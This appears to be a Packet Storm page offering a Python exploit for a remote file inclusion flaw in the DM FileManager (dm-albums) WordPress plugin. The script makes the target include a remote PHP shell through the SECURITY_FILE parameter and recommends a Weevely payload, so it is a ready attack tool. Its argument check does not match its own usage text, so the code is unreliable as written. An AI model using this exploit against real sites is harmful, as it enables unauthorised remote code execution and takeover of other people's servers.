In certain versions of the DM FileManager Wordpress Plugin, the security_file parameter does not correctly check the source of a file before including it, leading to a remote file inclusion vulnerability that can be leveraged to gain remote code execution.
41fbdd0b4c17113fac05e11bebc41175e9551ce9772141ef01a6e7e1db1f5db0#!/usr/bin/env python
# Title: DM FileManager security_file Remote File Inclusion Exploit
# CVE: ????-????
# Reference: http://secunia.com/advisories/35622/
# Author: infodox
# Site: http://insecurety.net/
# Twitter: @info_dox
# Old news, just practicin' my python :3
import requests
import sys
vulnurl = "/wp-content/plugins/dm-albums/template/album.php?" # Oh look, the vuln URL!
param = "SECURITY_FILE=" # the vuln paramater
payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right?
def banner():
print """
DM FileManager "security_file" Remote File Inclusion Exploit.
Rather lame exploit I must admit, just practicing my Python.
To use, just run it against the host and pray. I advise using a Weevely payload.
~infodox
"""
if len(sys.argv) != 4:
banner()
print "Usage: ./x2.py <target>"
print "Where <target> is the vulnerable website."
print "Example: ./x2.py http://lamesite.com"
sys.exit(1)
banner()
target = sys.argv[1]
pwnme = target + vulnurl + param + payloadurl
print "[+] Running Exploit..."
requests.get(pwnme)
print "[?] Gotshell?"
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed